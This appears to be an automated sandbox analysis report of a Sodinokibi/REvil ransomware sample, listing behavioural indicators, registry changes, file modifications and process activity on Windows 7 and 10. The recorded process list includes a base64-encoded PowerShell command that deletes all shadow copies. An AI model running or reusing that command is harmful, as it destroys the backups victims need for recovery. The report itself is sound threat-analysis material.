Analysis Overview
SHA256
c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390
Threat Level: Known bad
The file c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390 was found to be: Known bad.
Malicious Activity Summary
Sodinokibi family
Sodinokibi/Revil sample
Enumerates connected drives
Drops file in Windows directory
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-24 01:08
Signatures
Sodinokibi family
Sodinokibi/Revil sample
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-24 01:08
Reported
2022-01-24 01:25
Platform
win7-en-20211208
Max time kernel
150s
Max time network
152s
Command Line
Signatures
Enumerates connected drives
Drops file in Windows directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-newdev_31bf3856ad364e35_6.1.7600.16385_none_114ca177b1fcad24_newdev.dll_7eb7622f | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-a..structure.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_f6a00d30a34ae11a_sdbinst.exe.mui_258ad624 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-g..licy-base.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_4bf9d57947dd35b9_gpapi.dll.mui_ef0a9748 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-profsvc.resources_31bf3856ad364e35_6.1.7600.16385_en-us_c2b105891e24eb61_profsvc.dll.mui_32482e9e | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-rasrtutils_31bf3856ad364e35_6.1.7601.17514_none_6b3b9980011a19de_rtutils.dll_243724ab | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-crypt32-dll.resources_31bf3856ad364e35_6.1.7600.16385_de-de_250c5db92cbbfe4b_crypt32.dll.mui_4268f86a | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-comdlg32.resources_31bf3856ad364e35_6.1.7601.17514_zh-cn_4c840294b551dbf9_comdlg32.dll.mui_ac8e62f4 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-dui70.resources_31bf3856ad364e35_6.1.7600.16385_en-us_619e13eec4db6369_dui70.dll.mui_de5f27e2 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-m..ditevtlog.resources_31bf3856ad364e35_6.1.7600.16385_es-es_59a756fabb56ede3.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-b..nager-efi.resources_31bf3856ad364e35_6.1.7600.16385_cs-cz_97769b281ba398b8_bootmgr.efi.mui_be5d0075 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-g..licy-base.resources_31bf3856ad364e35_6.1.7600.16385_es-es_1cf4ea268abe27fe_gpsvc.dll.mui_0c160ac2 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-s..pp-client.resources_31bf3856ad364e35_6.1.7600.16385_de-de_ec4e337f0ce0896b_slc.dll.mui_dc24f809 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-webio.resources_31bf3856ad364e35_6.1.7601.17514_ja-jp_8c6fe68c0c8fba1a_webio.dll.mui_e805c4b7 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-wmi-core.resources_31bf3856ad364e35_6.1.7600.16385_en-us_30bc7fe1e159c5d3.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-mlang.resources_31bf3856ad364e35_6.1.7600.16385_pl-pl_856144d7e24caf0a.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-s..subsystem.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_961efb4172b82af7_scarddlg.dll.mui_300ae9df | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-font-bitmap-oem_31bf3856ad364e35_6.1.7600.16385_none_59590e92c817a4e0_s8514oem.fon_304f98b5 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-i..tional-codepage-936_31bf3856ad364e35_6.1.7600.16385_none_2acfd536b4ed2a23.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-p..structure.resources_31bf3856ad364e35_6.1.7601.17514_fr-fr_65c533f1c582e47c_perfi.dat_e3a35ecf | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-rasserver_31bf3856ad364e35_6.1.7601.17514_none_09cf3ec67e6c6b50_rasservermigplugin-dl.man_babd2d8e | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\wow64_microsoft-windows-appid.resources_31bf3856ad364e35_6.1.7600.16385_en-us_9c7424fcfaec8d6b.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-i..er-engine.resources_31bf3856ad364e35_6.1.7601.17514_tr-tr_d752a669f3ec89fa_msimsg.dll.mui_72e8994f | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-u..erservice.resources_31bf3856ad364e35_6.1.7600.16385_en-us_f09dccd4f32812c2.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-i..tional-codepage-775_31bf3856ad364e35_6.1.7600.16385_none_2ae98cfeb4d93dfc.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-m..ents-mdac.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_5c8a8ee4f97b7f12.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-shell32.resources_31bf3856ad364e35_6.1.7601.17514_es-es_b79b28ecefa21fda.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-wmi-core.resources_31bf3856ad364e35_6.1.7601.17514_es-es_32b8f08dde6f3b12_ncprov.dll.mui_40240de1 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-b..ager-pcat.resources_31bf3856ad364e35_6.1.7600.16385_zh-tw_82dac7a36bd74688.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-font-truetype-raavi_31bf3856ad364e35_6.1.7600.16385_none_a2d43ed8e3097243.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-w..-encoding.resources_31bf3856ad364e35_6.1.7600.16385_en-us_c49975d6cf9550ff.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-a..llservice.resources_31bf3856ad364e35_6.1.7600.16385_de-de_10d22dcfce04430a.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-appid.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_34a24d8db984d377_appidsvc.dll.mui_6717e231 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-comctl32-v5.resources_31bf3856ad364e35_6.1.7600.16385_lv-lv_359174e350f0ded0_comctl32.dll.mui_0da4e682 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-dfsclient_31bf3856ad364e35_6.1.7601.17514_none_e5c0334cfcbb6f1f.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-font-bitmap-fixed_31bf3856ad364e35_6.1.7600.16385_none_db04d3f548508fd9_h8514fix.fon_9a1c84fa | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-font-bitmap-terminal_31bf3856ad364e35_6.1.7600.16385_none_70644a8bdb0d9303_ega80737.fon_604f84b5 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-font-fms_31bf3856ad364e35_6.1.7601.17514_none_a5f8bb0ccaefbe07.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-newdev.resources_31bf3856ad364e35_6.1.7600.16385_en-us_cf00a033363ace4b.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-keyiso.resources_31bf3856ad364e35_6.1.7600.16385_de-de_6170816be6863ccb_keyiso.dll.mui_4bbf12ff | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-mlang.resources_31bf3856ad364e35_6.1.7600.16385_hr-hr_6ed8265c4c3dbb0a.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-d2d_31bf3856ad364e35_7.1.7601.16492_none_f6dafd66fdb9c254.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-b..ager-pcat.resources_31bf3856ad364e35_6.1.7600.16385_pt-pt_21d625cff367fd81.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-d..lient-dll.resources_31bf3856ad364e35_6.1.7601.17514_en-us_57ee6a4218527f7e_dhcpcore6.dll.mui_27872349 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-mlang.resources_31bf3856ad364e35_6.1.7600.16385_tr-tr_14424567ab0c4d42_mlang.dll.mui_2904864a | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-p..ndprintui.resources_31bf3856ad364e35_6.1.7600.16385_es-es_d2945884bb037beb.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-comdlg32.resources_31bf3856ad364e35_6.1.7601.17514_bg-bg_5abc71b3b20b3a94.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-commonlog.resources_31bf3856ad364e35_6.1.7600.16385_es-es_6e1909b6145934ca.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-e..rtingcore.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_8dd8c4f40dc38dd9_wer.dll.mui_e68ddae7 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\wow64_microsoft-windows-kernelbase.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_80e9298bf792ff3e.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-wintrust-dll_31bf3856ad364e35_6.1.7601.17514_none_f1b5a3b0f852fe0e_wintrust.dll_abec426a | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-x..nrollment.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_d84bdc3098a2df3d_certenrollctrl.exe.mui_3b48c5a6 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-errorreportingcore_31bf3856ad364e35_6.1.7601.17514_none_227e1c01642654f4_werdiagcontroller.dll_208f2db3 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-b..os-loader.resources_31bf3856ad364e35_6.1.7600.16385_de-de_299cd5b40ed6d155_winresume.exe.mui_ff8b5358 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-d..owmanager.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_34be759892c77101_dwmcore.dll.mui_ebf60d96 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-duser.resources_31bf3856ad364e35_6.1.7600.16385_de-de_283494514da2fa34_duser.dll.mui_3c369ac4 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-lddmcore_31bf3856ad364e35_6.1.7601.17514_none_09ee9e0dfa2c4fbd_dxgmms1.sys_9c98a5d4 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-session0viewer_31bf3856ad364e35_6.1.7600.16385_none_3ddbd9a9605f0519_ui0detect.exe_639495e3 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-mfc42x.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_64fae1eae3516fc5_mfc42.dll.mui_66106d85 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-commonlog_31bf3856ad364e35_6.1.7600.16385_none_da778c54413d0c9c.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-f..ruetype-new_tai_lue_31bf3856ad364e35_6.1.7600.16385_none_325f57c8c0ee36a8_ntailu.ttf_c1891505 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-lsa_31bf3856ad364e35_6.1.7601.17514_none_04709031736ac277_lsasrv.dll_56db747f | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-rasbase_31bf3856ad364e35_6.1.7601.17514_none_6c066d50910ecf5a_netrass.inf_8745cd37 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-s..resources.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_f9fce189b9d4bb7e.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-comdlg32.resources_31bf3856ad364e35_6.1.7601.17514_zh-tw_ac9edb6e6b20299f.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 105ffbe4c010d801 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 1540 wrote to memory of 860 | N/A | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1540 wrote to memory of 860 | N/A | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1540 wrote to memory of 860 | N/A | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1540 wrote to memory of 860 | N/A | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe
"C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-24 01:08
Reported
2022-01-24 01:25
Platform
win10-en-20211208
Max time kernel
119s
Max time network
151s
Command Line
Signatures
Enumerates connected drives
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
